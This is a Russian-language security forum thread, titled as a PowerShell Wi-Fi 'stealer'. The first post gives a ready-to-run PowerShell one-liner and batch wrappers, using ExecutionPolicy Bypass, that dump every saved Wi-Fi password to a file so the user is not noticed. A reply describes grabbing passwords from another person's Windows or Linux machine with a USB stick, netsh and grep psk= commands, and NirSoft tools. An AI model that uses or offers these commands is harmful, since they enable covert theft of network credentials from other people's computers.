• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Powershell или же стиллер для wifi

cat_meow_666

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
Всем привет)
Пишу первый раз, раньше никогда не писал(
Если все будет супер буду писать и в будущем.
Сам учусь на СИБ-ца :) буду рад за лайки)
Тема своя)

Тема пойдет на powershell.
все мы знаем замечательную команду в CMD
1) "netsh wlan show profiles" - чтоб посмотреть на какие сети компухтер или ноут был подключен.
2)"netsh wlan show profiles "ESSID" key=clear"- чтоб посмотреть пароль от сети.

Нам не удобна смотреть каждый процесс отдельно. Вот поэтому ускорим этот с помощью POWERSHELL
" (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize " - ENTER.


Но пока откроем POWERSHELL и напишем этот скрипт нас спалят(
и вот поэтому мы сейчас сделаем БАТ файл.
1) Отрываем Текстовый документ пишем " (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize " (Без кавычек). И сохраняем "powerkey.ps1"
2)Отрываем Текстовый документ пишем "powershell.exe -ExecutionPolicy Bypass -File powerkey.ps1" Сохраняем pow.bat
3) и последний файл опять отрываем Текстовый документ пишем

@echo off
call pow.bat >wifi/1)wifi.txt 2>&1
exit

И сохраняем start.bat .

4) кидаем все 3 файла в одну папку и в этой же папке создаем папку с название "wifi".
вот и все)
(САМ СКРИПТ НЕ РАБОТАЕТ НА ВСЕХ КОМПЬЮТЕРАХ, В моем случай 4/5).
 
Последнее редактирование:
  • Нравится
Реакции: orangedao, Cecrops, Valkiria и ещё 4
Remir

Remir

Grey Team
05.11.2017
282
354
BIT
371
К чему все эти сложности? И не на всех ПК работает (это отдельная тема, там есть тонкости). Хорошо это исключительно для личного общего развития. Кстати, у меня на данном компьютере - не сработало.
Я прекрасно обхожусь следующими двумя инструментами:
  1. Имею на флешке (я так понял, что вся суть ТС в том, чтобы увести PW WiFi) папку WiFi (назовем ее так), а в ней пятОк (можно десяток - кому как удобно и нужно) файлов 1.txt, 2.txt, 3.txt и т.д. со следующим содержанием:
    Код: 
    netsh wlan show profiles
netsh wlan show profiles "ESSID" key=clear
    На случай Линукса можно добавить строку
    Код: 
    sudo cat /etc/NetworkManager/system-connections/ИМЯ_СЕТИ | grep psk=
    , а если имя неизвестно, то
    Код: 
    sudo grep psk= /etc/NetworkManager/system-connections/*
    . Для удобства их можно вообще держать вместе и выбирать по потребностям, я разнес только для визуального разделения. Итак, выдалась возможность "пошарить". Вставляем флешку, открываем под админом комстроку и текстовик 1. А дальше все быстро и просто: копируем Win-довые команды разом и перепрыгиваем на командную строку, не закрывая текстовик. Вставляем и у нас уже выполнилась первая строка, быстро вписываем ИМЯ_СЕТИ и жмем ENTER. В W10 остальное быстрее всего: CTRL+A, CTRL+C - перескок на текстовик CTRL+V, ALT+F4, ENTER. В младших ОС (за 8-рку не ручаюсь, я ее "органически не перевариваю" и даже не изучал) все эти операции придется выполнить мышкой. Для Линукса я даже расписывать не буду, тут операции с файлами знает 99%. А оставшемуся 1% я посоветую начать изучение Linux именно с этого пункта, а не с увода паролей.
  2. Зачем изобретать велосипед, когда есть уже проверенные и отработанные инструменты? Вот мой списочек, которого, "за глаза" хватает для подобных целей. И всего-то около 35 Мб. Это NIR-soft.
NIR.JPG

Он находится на этой же флешке. Запускаем в зависимости от разрядности ОС и получаем результат

Nir_WirelessKey.JPG


Через правую кнопку мыши на выбранной строке можно сделать экспорт в ASCII для удобочитаемости. Всего-то три щелчка мыши и результат в кармане.

P.S.
Мой пост нисколько не несет в себе отрицания способа ТС. Просто я предпочту изложенный мной вариант.
 
  • Нравится
Реакции: Vertigo и n01n02h
cat_meow_666

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
я раньше об этой программе не знал(
спасибо проверил и работает на ура)
 
Remir

Remir

Grey Team
05.11.2017
282
354
BIT
371
Это не программа, это целый "комбайн". А данная утилитка - лишь его малая часть.
Качни и пользуйся ))
 
  • Нравится
Реакции: bibka и cat_meow_666
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ